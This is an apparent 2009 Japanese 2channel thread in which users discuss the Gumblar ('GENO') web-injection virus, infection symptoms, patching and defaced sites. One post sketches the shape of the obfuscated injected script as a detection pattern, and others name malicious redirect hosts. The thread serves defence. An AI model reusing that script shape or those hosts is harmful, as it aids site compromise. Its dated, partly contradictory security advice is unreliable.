271 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:15:37 ] シンプルかつ効果的な対策をモットーにしてますw まだまだXPも現役だからUACに頼らない対策もしてるよ
272 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:21:18 ] どこまで再現出来るかは分からないがXPユーザーでも UACもどきな非公式ソフトやノートンの制御設定で似たような事ができるかも
273 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:36:45 ] 2kやXPでVistaのUACモドキなことをやってたから Vista出たときUACの使い勝手の良さに感動したけれど 巷では最低の評価だったなぁ…
274 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 18:24:17 ] ブログの中の人、かわいそう だれか、助けてあげて
275 名前:名無しさん@お腹いっぱい。 [2009/07/27(月) 18:25:47 ] あんたが余計な事をやったんじゃないの
276 名前:名無しさん@お腹いっぱい。 [2009/07/27(月) 18:41:37 ] リカバリー推奨
277 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 18:50:33 ] 俺たちのリカバリー・ナイト おまえリカバリ
278 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/28(火) 13:58:05 ] GENOの歩き方 tsushima.2ch.net/test/read.cgi/news/1248744891/
279 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/30(木) 17:08:16 ] どうでもいいけどセキュリティ板にFlashとadobe readerの専用スレたてろよ どうみてもあちこち集中攻撃受けていて、今旬のこの板の花形ですがな
280 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/30(木) 17:21:15 ] 必要だと思うなら自分でたてろよカス
281 名前:名無しさん@お腹いっぱい。 [2009/07/30(木) 21:41:34 ] セキュリティ板は高スキルが求められる 厨房らには荷が重すぎたってわけよ セキュリティソフトが扱えるだけでは芋扱いされるだけだしな
282 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/31(金) 05:39:13 ] ようやくflash playerが更新
283 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/31(金) 14:16:55 ] 情報元は忘れたんだが、 watch_akibaのTwitter ↓ がよく利用している twitter.com/watch_akiba twitpic.com(174.36.0.0 - 174.37.255.255) って危ないのか分かる人いない? 数週間前にどこかのサイトを元にファイアーウォールのブロックIPにガンガン登録していったら、 この範囲をドンピシャで登録していたみたなんだが、とんでもない数の利用者が存在するはずだから、 本当にヤバイのか、自分がボケていただけなのか分からなくなった。 watch_akibaのTwitterにいって、画像リンクを踏むとtwitpic.comにつながるよ。 >>253 ペアレンタルコントロールとかで、ドメイン指定ブロックだと危ないから リモートIPでブロックしていれば安心ってことかな?
284 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/01(土) 04:08:51 ] Adobe Reader更新きました
285 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/08(土) 21:58:31 ]
286 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/15(土) 17:47:13 ] 結局大手のアンチウイルスソフトで対策できてるところは未だにないの?
287 名前:名無しさん@お腹いっぱい。 [2009/08/15(土) 21:05:12 ] そもそも被害者いないもん 架空のウイルス
288 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 12:35:59 ] と思いたいgeno社員乙
289 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 14:56:50 ] 既出かもしれんが ちんこアプロダっていう同人誌うpしてるサイトがGENOウィルスに感染してることが判明した。 たまに見てた奴とかは気をつけろよ。 しばらくはアクセスしない方がいい。
290 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 22:16:20 ] 5月の話じゃねーか。
291 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 23:55:26 ] ちんこアプロダ 危険度0% 安全なURLです。踏んでも大丈夫でしょう。
292 名前:名無しさん@お腹いっぱい。 [2009/08/19(水) 15:27:34 ] ウイルスバスターのフィッシングレベルを高にすれば GENOウイルス系をほぼ100%防げるってあったけど ウイルスバスターって意外と凄いんだな
293 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/19(水) 20:55:03 ] 安全なサイトもほぼ100%ブロックされますけどね
294 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/20(木) 00:01:00 ] ttp://www.itmedia.co.jp/enterprise/articles/0908/19/news020.html 相次ぐサイト改ざん攻撃、「Genoウイルス」感染PCが関与か 原因を調べたところ、この顧客がホスティングサーバへのファイルアップロードに 使っていたPCが、「Gumblar」(別名JS-Redir、 Genoウイルス)タイプのマルウェアに 感染していたことが分かったという。ただし5月に出回ったGumblarとは異なる点もあり、 コードに手を加えた亜種の可能性もあるとしている。
295 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/20(木) 00:10:35 ] バスターって確かGENO発生当初にこのウイルス対策をユーザーから問われて 「履歴を消してください」 と答えた素敵な会社だっけ。
296 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/20(木) 00:14:17 ] >>GENOウイルス(通称)に御社は対応済でしょうか? ___ ∧∧ / || ̄ ̄|| ./台 \ ・・・・ | ||脅威|| (ハ´;; ) | ̄ ̄\三⊂/ ̄ ̄ ̄/ | | ( ./ / カタカタ カタカタ ___ ∧∧ / || ̄ ̄|| /台. \ ?! GENOウイルスって何アルカ?? | ||安心|| (`ハ´* ) | ̄ ̄\三⊂/ ̄ ̄ ̄/ | | ( ./ /
297 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/21(金) 18:26:11 ] バスターさんはWinnyグループの一員だからなぁ
298 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/03(木) 23:40:06 ] ほす
299 名前:名無しさん@お腹いっぱい。 [2009/09/05(土) 08:00:10 ] ■新型の「Webウイルス」が感染拡大 pc.nikkeibp.co.jp/article/trend/20090722/1017170/?set=rss セキュリティ会社や組織は5月中旬、「Gumblar(ガンブラー)」などと呼ばれる新たなWebウイルス(Webページに埋め込まれるタイプのウイルス)が 世界中で感染を広げているとして注意を呼びかけた。 脆弱(ぜいじゃく)性のあるパソコンでは、Webウイルスが埋め込まれたページにアクセスするだけで被害に遭う恐れがある。実際、国内でも多くの被害が報告されている。 ■09月04日のWeb改竄情報 https://www.netsecurity.ne.jp/9_13925.html ■09月03日のWeb改竄情報 https://www.netsecurity.ne.jp/9_13910.html
300 名前:名無しさん@お腹いっぱい。 [2009/09/05(土) 11:20:10 ] あのーすみません、 当初お菓子やさんだかなんだか休日に 電凸するかとか言ってる時居たんだけど まさかまだ放置なの? そろそろ許してやるかってGENO見ようとしたんだけど…
301 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/11(金) 05:25:39 ] あれ、GENOウイルスチェッカーとか言うサイト繋がらないけど閉鎖したのか?
302 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/11(金) 05:48:34 ] さすが糞さいと
303 名前:名無しさん@お腹いっぱい。 [2009/09/13(日) 23:39:45 ] 再起動画面のまま、何度再起動させても電源切っても全然起動出来ないです。GENOでしょうか… 対策何もしてなかったので。 どうしたらいいのかわからないです もうパソコンは二度と起動しないのでしようか。
304 名前:名無しさん@お腹いっぱい。 [2009/09/13(日) 23:45:30 ] セーフモードでやってみ? だめならCDブートだ。(OS再インストール)
305 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/13(日) 23:55:53 ] >>304 セーフモードだめです OS再インストール…はやってないです。いつも使ってないスクリーンセーバーをダウンロード&設定した後だったのでそのせいだ 休ませれば直ると信じたかったのですが…。orz 早いレスありがとうございました。
306 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/14(月) 03:27:04 ] CMDがいつのまにか起動 パソコン重い しかしファイルサイズは正常 別のウィルスだなこれは……
307 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/17(木) 14:06:43 ] avastで駆除できたっぽい。 sqlsodbc.chmが消えたし。win2000
308 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 01:27:53 ] やっぱavast凄いな
309 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 05:03:51 ] 208.87.
310 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 14:23:39 ] win2000でavastで削除してsqlsodbc.chmを消去して その後また復元してなければ大丈夫?
311 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 16:46:18 ] GENO感染したのですが、 個人情報流出は具体的にどの程度なんでしょうか? 保存してるファイルも流出してしまいますか? PC素人です。 どなたか教えてください。
312 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 13:00:12 ] 梨花ブログが感染してて、連休中で対処できてないからエライことになってる。
313 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 13:40:57 ] 行ってないからわからんけど貼られてる広告にやられてるのかな りんかもとんだとばっちりだな
314 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 16:36:57 ] >>313 ちょうど連休前の金曜の夜からおかしくなって、スタッフも休んでるのか未対応。 メッセージもスタッフ通してから梨花に送られてるみたいで、本人も知らずに更新しまくり。 梨花スレは大混乱。
315 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 16:45:44 ] 確かGENOも休み中にやられたんだったよな ブログ見てPCリカバリとかマジ最悪だね PC詳しくない奴はどうするのか 自分の手に負えない奴もいっぱいいそうだ
316 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 17:12:23 ] >>315 梨花ブログ見る層はパソコン詳しい人あんまりいなさそうだからね。 私もその1人で、不安になってこのスレ来てみました。 ファイル名を指定して確認?したら一応大丈夫そうだったけど、亜種もあるみたいだから油断できませんよねー ほんとうろたえてますw
317 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 17:17:57 ] FlashPlayerは最新に PDFReaderも最新に JavaScriptは基本的に切っておく これでだいたいは防げるはず 初心者はIEを使うよりもFireFox+NoScript使用のほうが安全
318 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 19:51:19 ] コマンドプロンプトが立ち上がればよかった筈だが
319 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 20:58:13 ] vistaにしてUACを使う が一番いい
320 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 00:45:48 ] vista+UAC+砂箱 これで核級のウイルスがきても全部シャットアウト
321 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 04:35:30 ] win2000でavastで削除してsqlsodbc.chmを消去して その後また復元してなければ大丈夫?
322 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 05:03:28 ] >>320 全部はシャットアウトできない 砂箱にもUACにもどうせ穴がある
323 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 21:25:32 ] アーモー大騒ぎ
324 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/24(木) 12:53:16 ] ウィルスバスターでGENOウィルスが隔離されていました。 まとめサイトにある確認法で調べたら、 cmdの値?が正常ではなく、低いままでした。 まだ感染しているということでしょうか?
325 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 00:07:07 ] 一度感染したという事は既にシステムがぼっこボコにされている可能性が高いから クリーンインストールした方がいいと思うんだ。
326 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 15:25:28 ] >>325 システム?もやられるのか? 俺もavastで知らぬうちに削除してて(たぶん)その後、変な挙動はないのだが
327 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 16:12:13 ] >>326 カスペとかノートンのオンラインスキャンして見て検出なければいいじゃね? オレは精神衛生上の問題でクリーンインストールするけどね
328 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 16:13:43 ] kスペでやったけど問題なかったよ
329 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/29(火) 05:04:20 ] genoじゃないがサイト巡回してたらノートンのIDセーフ(かなりいい加減)が真っ赤になったから ソース確認したら本当に埋め込まれててふいたw activexの脆弱性を突くタイプでvista/firefoxじゃなかったら感染していたんだろうな
330 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 12:58:01 ] 萌えミシュラン感染してる 上記サイトのソースの中に 変なURLの記述がある (.ruのロシアのサイト?) 改竄されたみたい。 管理人が気付いて 「当サイトのトップページが改竄されました」 っていう文章に内容が変わってるけど それも改竄されて また別のロシアのサイトのURLが…
331 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 15:59:47 ] そのロシアのサイトのページは空 今のところ無害
332 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 16:39:01 ] と思ったが何かうまくやって 空のページが表示されるときがあるのかもね 無害は取り消し
333 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 23:52:30 ] >>330 Googleだと危険なサイトと表示されるね ttp://www.google.com/safebrowsing/diagnostic?site=moem.hp.infoseek.co.jp/&hl=ja
334 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 01:22:48 ] >>330 行ったことがないサイトだけど報告ありがとう。
335 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 08:27:01 ] 今さっきGENOウィルスの存在を知った 片っ端から調べて、うちのPCもチェックしたが、感染してなかった とりあえず OS→Vista ブラウザ→FireFox最新版 セキュリティ→ノートン2009 ・Adobeリーダー&フラッシュプレイヤーをアップデート ・Javaスクリプトオフ ・Adobeリーダーのスクリプトもオフ ・今後しばらくネットは可能な限り携帯でカバーする予定 て感じなんだが、なんかまだまずいことある? 5月ごろまでの情報しか探せなかったんだよ…今現在でもこの対策で大丈夫なのか教えてくれ これだけは調べきれなかったんだ、すまん
336 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:14:35 ] Windows updateもしておけ
337 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:44:15 ] >>336 サンクス いまやってる あとUACもオンに直しておいた このウィルス自体は今はとりあえず全く動き(新種出たとか)はないと思っていいの?
338 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:47:45 ] Vistaには無害
339 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:53:10 ] >>338 あれ、俺が見たサイトにはご丁寧にVistaのチェック方法なんて載ってたんだが… それはなぜなんだぜ?無害なら必要なくね? 純粋に疑問
340 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:57:18 ] 用心しろってことじゃね 無害だよ GENO自体はもう見ないけど 似たような物もあるし用心はしておいた方が良いってことじゃね
341 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 10:08:43 ] >>340 ありがとう 今ざっと調べてきたが、「今のところ無害だが油断はできない」みたいだな ひとまず落ち着いてはきたんだな これをいい機会に気をつけるわ 本当助かった 皆ありがとう
342 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 01:10:52 ] 初期にはvistaでもウィルスにかかってた人がいたからな。UACを切ってたせいで。 だからまぁ、vistaでもたまにはsqlsodbc.chmのファイルサイズが 50,727 バイトであることを確認しておくのも悪くない。
343 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 01:16:51 ] それは嘘だろ
344 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 01:24:12 ] vistaが安全かどうかに関係なく GENOはVistaやServer2008は最初から除外してる UACは無関係 感染は嘘
345 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 17:38:58 ] UAC無効だとGENO”以外”での似たような構造を持ったウィルスの感染例はあるな GENOそのものはXPを切り捨てるだけでOK
346 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 22:42:50 ] >>338 嘘 UACをOFFしてあるならアウト あちこちの初心者サイトでOFFにするおすすめが載っている現状で その結論は危険
347 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 22:44:59 ] 何を言ってるんだ君は
348 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 22:56:17 ] 適当な糞アフィサイトに騙されとる
349 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 23:04:19 ] なんか勘違いする人もいそうなので >>346 Gumblarはたはgenoウイルス と呼ばれる物について話してる これに関してはVistaは対象外ということ Vistaが他の攻撃に安全と言ってるわけではない
350 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/10(土) 13:08:04 ] イラストサイトの Pafe Cafe red.sakura.ne.jp/~izumi/ 感染してた。(現在は対策済み) Googleキャッシュにはもう残ってないが 百度のキャッシュには残ってた。 HTMLのソースコードはavastで HTML:Illiframe-C [Trj]として反応 soul-of-man.ru:8080/index.php (IPアドレス:85.17.138.27) に飛ばそうとしてたみたい。 萌えミシュランが感染した時も いくつかのサイトに飛ばそうとしてたが、 その中に85.17.138.27もあったと記憶している
351 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/10(土) 21:24:17 ] >>350 脆弱性が使われてたの?
352 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/11(日) 22:48:16 ] >>351 上のサイト(.ruドメインの方)に アクセスすれば 脆弱性を付く不正なPDFファイルとか 不正なフラッシュファイルとか ダウンロード出来ると思う。 アクセスしたくないけど。 そういうサイトに無理矢理、強制で 誘導しようとしてた。
353 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/12(月) 06:23:50 ] >>352 恐ろしいな。 既存の脆弱性ならいいんだけどね。
354 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:37:04 ] GENOウイルス感染したかも・・・。 ヤバイと思ってPC電源切っちゃったあと 起動しようとしてもPC再起動繰り返す (多分ブルースクリーン)ようになったから もう確認のしようがないけど。 何か勝手にアドビリーダー開いたり 謎のtmpファイルを勝手に開こうとしたり コマンドプロンプトで一瞬何かやってたので GENOウイルスで間違いないと思う。 どうやってデータ復旧しようか考え中。
355 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:40:43 ] >>354 あらかじめ対策ってとってましたか? もし、とってても感染したなら焦るのでよければ教えてケロ。
356 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:47:25 ] >>355 GENOウイルスの存在自体知らなかったので対策はとってませんでした。 ただAdobeReaderとIEのFLASHは9月中に一回アップデートしていました。 しかし今回はOperaを使ってHP閲覧してて、 IEのFLASHはアップデートしててもOperaのFLASHは古いまま だったのが敗因のようです。
357 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:57:07 ] >>356 d 他スレでまた活動始めたなんて話も聞くので、 新たな対策が必要なのかな、と少し焦りました。 adobeは最近頻繁にうpデートするから注意必要ですね。 データ復旧マンドクサだろうけど、がんばってケロ。
358 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:02:53 ] >>356 Readerの最新は10月14日だからそれもアウトだね。
359 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:13:19 ] 他スレに貼ったやつだけど貼っとく 今回はMS09-043あたりもからんでるみたいだからMicrosoft Updateもしてね 対策 ・MSUpdateをする www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ja ・Adobe Reader(Acrobat, Acrobat Reader)を使ってないならアンインストール 使ってる場合は9.2.0に更新 インストールの有無はプログラムの追加と削除から確認 DLサイト get.adobe.com/jp/reader/ ・Adobe Flash Playerの更新(動画サイト見てるなら絶対入ってる) 最新は10.0.32.18 確認はこれ www.adobe.com/jp/software/flash/about/ DLサイト get.adobe.com/jp/flashplayer/
360 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:16:01 ] Flash PlayerはIEとそれ以外で違うよってのも追記だな
361 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:36:11 ] Adobe ReaderもAdobe Flash Playerも削除したよオレ。 どうせ使わないし。
362 名前:名無しさん@お腹いっぱい。 [2009/10/19(月) 02:01:29 ] 2009.10.18 日曜日 (手抜き版) www3.atword.jp/gnome/2009/10/18/oct-18-09-sun-rapidly/ Gumblar strikes back? [EMERGENCY] 先日、さまれぼ!管理人様より警報を受け取っていたのですが、Gumblarに強いScanSafeも警報を発しました。 Gumblar Website Botnet Awakes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32 sqlsodbc.chm という、悪夢のキーワードをもった Gumblar(GENO/zlkon/Martuz/JSRedir-R/Daonol)が、蠢動を再開した模様です。 現時点で使用されている脆弱性は MS09-043 : Microsoft Office Web コンポーネントの脆弱性により、リモートでコードが実行される (957638) という、9月に塞がれたものですが、それ以外にも脆弱性攻撃を仕掛けてくる可能性がありますので注意が必要です。 ※マイクロソフト セキュリティ情報 MS09-043 - 緊急 www.microsoft.com/japan/technet/security/bulletin/MS09-043.mspx
363 名前:354 mailto:sage [2009/10/19(月) 02:59:26 ] お騒がせしました。 感染したHDDを他PCに取り付けてウイルスチェックしたところ、 GENOウイルスではなかったようです。 何らかのサイトを見たことによってAVCareというソフトが インストールされてしまったようです。 (いかがわしいサイトではありません。遊戯王のCDについて 調べていたときに起きた出来事です。) 他にもトロイが2、3個検出されていましたが、 いずれもGENOウイルスとは関係ないようでした。 症状が似ていた理由は不明ですが、sqlsodbc.chmの ファイルサイズが正常だったことから見ても GENOウイルスの感染ではなかったようです。 しかし、HPを見るときに注意することに越したことは ないみたいですね。もしかしたら似た仕組みで インストールされたのかもしれないので・・・。
364 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 03:23:48 ] >>363 最新版のGeno亜種は検出できるの少ないみたいだから無いとは言い切れないよ つーかそんだけいろいろ感染してた状態ならOS入れなおしたほうがいい
365 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 07:33:35 ] 今回のはC:\になんとか.bakってのを常駐させるくさ (ファイル名ランダム)。
366 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 10:55:17 ] 再襲来したGENOウイルスについて報告してるブログみつけた。 ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、 今度のスクリプトだと陥落した別サイトで撒いてるから、 従来のチェッカーじゃ判別できないな。
367 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:03:32 ] 糞通販ショップGeno ウイルス再び tsushima.2ch.net/test/read.cgi/news/1255886283/
368 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:09:47 ] 今回もAvastはスクリプトを検知出来るようだ。
369 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:27:45 ] >>368 いくつかパターンがあるみたいだけどそのうち1つは反応した もう1つはスルー 他はわからん
370 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:45:01 ] >>366 チェッカーは知らんけど挿入位置は同じっぽいな
371 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 14:10:55 ] もう少し詳しく挙動を解説したブログ ttp://ilion.blog47.fc2.com/blog-entry-154.html ウイルスをホスティングしてる改竄サイトが無数にあるわけだ。 もぐら叩きだな、これじゃ・・・
372 名前:名無しさん@お腹いっぱい。 [2009/10/19(月) 14:16:15 ] 感染してるサイトのurlをチェッカーに突っ込んでみたが、危険度0.5% でスルーされた。
373 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 14:18:24 ] あんなの誰も使ってないだろ
374 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 15:11:31 ] 今回のはだめだ…HTMLソースにこれあったら確実にアウト、みたいなルールが作れねぇ。
375 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 15:38:50 ] 何したいんだかわからんけど>>366 見た感じこれでよくね .php ></script><body> PHPファイルも見れるならこんな行があるか見るとか eval(unescapse(*.replace(/[*]/g,*))); だいたいこんなパターンでそ //<script> try{if(hoge='適当な文字')throw new TypeError('');}catch(){} moge='難読化コード'; eval(unescapse(hoge.replace(/[huga]/g,hoge))); ここに何かあるときもある //</script>
376 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 15:40:18 ] .php ></script><body> これじゃ有害とは断定できねーべ 踏み台側のを拾いに行くのも正直めんどい
377 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 16:08:02 ] 何したいのかわからん 誤爆率そこまで高くないと思う まったくないわけじゃないだろうけど ローカルでやるには気にするほどではないレベル
378 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 20:22:44 ] ttp://www.ripping.org/ 某スレでこのスレが紹介されていたので来ました 上記サイトなんですが、検索エンジン(google)の結果の地点で警告が出るのですが サイト上に何か仕込まれているんでしょうか? 一見、何の変哲もないPC関係のサイトのように見えますがブラウザレベルでもブロックをくらうようです
379 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 20:51:24 ] 「今は」特に何もないけど。
380 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 20:57:50 ] >>378 safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=http://www.ripping.org/ 疑わしいサイトとして認識されています。 このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。 不正なソフトウェアは t-age●ru/ を含む 1 個のドメインでホストされています。 この結果を使用しているFirefox、Chromeで見るとアウト判定になる いまは見た感じなさそうだけど、攻撃スクリプトを誰が削除したのかわからないから うかつに見ないほうが良いだろうね
381 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 21:22:30 ] >>379 ,>>380 大変参考になります 有難う御座いました
382 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/20(火) 14:59:19 ] セキュリティホールmemo ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/10.html#20091020 リンクだけだけど、大御所来た。これでボンクラ鯖管も注意を払うといいが…
383 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/20(火) 22:39:31 ] >>382 おっかないから 「aguseゲートウェイ(代理読み込み)」 gw.aguse.jp/ を使って見てきた俺ガイル orz
384 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 01:16:42 ] >>383 石橋を叩いて人に渡らせる行為をなにも恥じることはあるまい。
385 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 03:43:01 ] 334 名前:GENO 投稿日:2009/10/20(火) 17:13:09 ID:pXNvHr1I0 ここ見てあちこちGENOスレ回ってきたら > 感染したまま放置されてたサイトや、 > 対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・ マジすか・・・ 335 名前:GENO 投稿日:2009/10/20(火) 17:24:34 ID:mGYwobiA0 >>334 マジです。 たとえばGenoVirus感染サイトリストに出てる「対策済み」サイトの中にも、 再感染してるのがある。 もっと言えば、告知なしで再開してるサイトの一部。 告知なしで再開して、再感染したところは、 管理者が根本的な対策(OSの再インストール→サイトの復旧)を やってなかった(自分のPCの感染に気づいていない)んでしょう。。。
386 名前:名無しさん@お腹いっぱい。 mailto:age [2009/10/21(水) 12:41:35 ] ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html JRAレーシングビュアーでサイト改ざん ウイルス感染の疑い(2009.10.21) 株式会社中央競馬ピーアール・センターは20日(火)、 JRAレーシングビュアーの一部ページが一時改ざんされ、 改ざんされた期間中にサイトを閲覧した会員が ウイルスに感染した疑いがあると発表した。 サイト改ざんされた疑いのある期間は 15日(木)18時から20日(火)13時までの間。 この期間中に悪意のあるコードがサイト内に埋め込まれ、 サイトを閲覧すると "Gumblar"または"JSRedir-R" (通称「GENOウイルス」とも呼ばれる) に感染する可能性が生じたとのこと。 サーバー管理会社に調査依頼の上、 現在はこの悪意のあるコードはすべて除去され、 ウイルス感染の心配はないとのこと。 またこのサイト改ざんによる 個人情報の流出はないとのこと。
387 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 21:36:08 ] なぜこういうのをAdobeが作らないのか…。 Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」 www.forest.impress.co.jp/docs/review/20091020_323014.html
388 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 22:02:37 ] >>386 レーシングビュアーは会員向けの有料サービスなのか ホームページには普通にアクセスしてたからビビったけど とりあえず害は及ばずといったところか しかしJRAがGENOウイルスとハッキリ認識しているとは GENOの知名度って想像以上に高いなあ
389 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 00:07:15 ] >>387 これはいい
390 名前:名無しさん@お腹いっぱい。 [2009/10/22(木) 10:14:21 ] おれ素人だけどGENO見終わって閉じようとしたら何回やってもだめで 怖くなって電源切った。これだったのかウィルスソフトはいれてますが。
391 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 10:20:43 ] 何の責任も負わない個人が作ったものだし、 作者がその気になれば偽物をDLさせられて泣きを見るだけだろ。
392 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 10:36:26 ] >>391 は>>387 に対してのものか だからこそ >なぜこういうのをAdobeが作らないのか…。 個人ではないベンダーに期待を寄せるような コメントが書き添えられているのではないか
393 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 11:07:29 ] なぜも何も自動でアップデートするようになってるだろ
394 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 12:59:55 ] えっ
395 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 13:43:23 ] Genoウイルス(Gumblar)検出状況 slashdot.jp/~pluto/journal/491348 このphpファイルは見に行くたびに変わりますが、 カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。
396 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 16:36:03 ] >>390 ウイルスはいれちゃだめよ
